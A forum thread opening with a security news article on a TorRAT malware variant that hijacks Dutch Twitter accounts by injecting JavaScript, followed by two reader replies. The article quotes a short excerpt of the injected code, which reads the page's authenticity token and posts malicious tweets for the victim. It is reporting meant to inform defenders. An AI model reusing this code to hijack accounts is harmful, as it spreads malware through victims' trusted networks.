2

Dana Tamir, Enterprise Security Director for Trusteer has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by "injecting Javascript code into the victim’s Twitter account page" Tamir says, adding that the malware "collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". These tweets are used, of course, to spread the malware within the social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When these accounts are compromised by such an attack it becomes quite easy to persuade followers to click through to drive-by-malware pages, simply courtesy of the level of implied trust invested in the original poster.

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as ""Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.

Dana Tamir provided an excerpt from that injected Javascript code to highlight what is being done:

function _PostTweet() {
        var a = $('input[name="authenticity_token"]').val();
        a.length > 0 && $.post("/i/tweet/create", {
            authenticity_token: a,
            place_id: "",
            status: _GetRndMsg()
        }).always(function () {
            ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
        })
    }

Trusteer advises that enterprise exploit prevention technology, preventing vulnerable endpoint user applications (browser clients) from being exploited and malware downloaded and executed, is the best way stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted" Trusteer says "Such content should only be opened while monitoring the application state to ensure it is operating legitimately".

As Editorial Director and Managing Analyst with IT Security Thing I am putting more than two decades of consulting experience into providing opinionated insight regarding the security threat landscape for IT security professionals. As an Editorial Fellow with Dennis Publishing, I bring more than two decades of writing experience across the technology industry into publications such as Alphr, IT Pro and (in good old fashioned print) PC Pro. I also write for SC Magazine UK and Infosecurity, as well as The Times and Sunday Times newspapers. Along the way I have been honoured with a Technology Journalist of the Year award, and three Information Security Journalist of the Year awards. Most humbling, though, was the Enigma Award for 'lifetime contribution to IT security journalism' bestowed on me in 2011.

3
Contributors
2
Replies
24
Views
4 Years
Discussion Span
Last Post by diafol
0

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as ""Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.

This sound like an isolated incident maybe not if it starts spreading but it's good to know. So I can be aware with this javascript code.

Not sure why they used this phrase:

Our new King William will earn even more than Beatrix. Check his salary

What the meaning behind it.

To me it meant

Wee kin william will earn even mooar than beytrix. check 'is salary 

Edited by LastMitch: grammer

0

Interesting. But how does the js get into a stored post in the first place? How is the script injected? I can understand that the js code is sent to the server, but doesn't Twitter screen and strip any possible malicious code?

Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.